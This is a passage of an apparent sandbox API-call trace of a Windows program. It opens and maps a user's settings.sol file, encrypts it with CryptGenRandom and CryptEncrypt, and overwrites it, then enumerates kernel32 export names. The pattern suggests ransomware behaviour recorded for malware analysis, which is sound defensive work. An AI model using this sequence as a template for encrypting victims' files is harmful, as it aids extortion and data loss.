(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0077.334] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x3f2cf88 | out: lpFileSize=0x3f2cf88*=470) returned 1 [0077.334] CreateFileMappingW (hFile=0x470, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x474 [0077.335] MapViewOfFile (hFileMappingObject=0x474, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.335] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.335] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.335] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.335] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2cef0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2cef0*=0x100) returned 1 [0077.335] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.336] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.336] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.336] CloseHandle (hObject=0x474) returned 1 [0077.336] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.336] WriteFile (in: hFile=0x470, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2cf10, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2cf10*=0x108, lpOverlapped=0x0) returned 1 [0077.337] CloseHandle (hObject=0x0) returned 0 [0077.337] CloseHandle (hObject=0x470) returned 1 [0077.338] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.338] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.338] GetTickCount () returned 0x114bd76 [0077.338] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.339] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.339] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.339] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.339] lstrlenA (lpString="kernel32.dll") returned 12 [0077.339] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.339] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.339] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.339] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.339] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.339] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.339] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.339] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.340] lstrlenA (lpString="ADDATOMA") returned 8 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.340] lstrlenA (lpString="ADDATOMW") returned 8 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.340] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.340] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.340] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.340] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.340] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.340] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.340] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.340] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.340] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.340] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.340] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.340] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.340] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.340] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.340] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.340] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.340] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.341] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.341] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.341] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.341] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.341] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.341] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.341] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.341] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.341] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.341] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.341] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.341] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.341] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.341] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.341] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.341] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.341] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.341] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.341] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.342] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.342] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.342] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.342] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.342] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.342] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.342] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.342] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.342] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.342] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.342] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.342] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.342] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.342] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.342] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.342] lstrlenA (lpString="BEEP") returned 4 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.342] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.342] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.342] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.342] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.343] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.343] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.343] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.343] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.343] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.343] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.343] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.343] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.343] lstrlenA (lpString="CANCELIO") returned 8 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.343] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.343] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.343] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.343] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.343] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.343] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.343] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.343] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.343] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.343] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.343] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.344] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.344] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.344] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.344] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.344] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.344] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.344] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.344] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.344] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.344] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.344] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.344] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.344] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.344] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.344] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.344] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.344] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.344] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.344] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.344] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.345] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.345] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.345] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.345] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.345] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.345] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.345] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.345] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.345] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.345] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.345] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.345] lstrcpyA (in: lpString1=0x3f2c304, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.345] lstrlenA 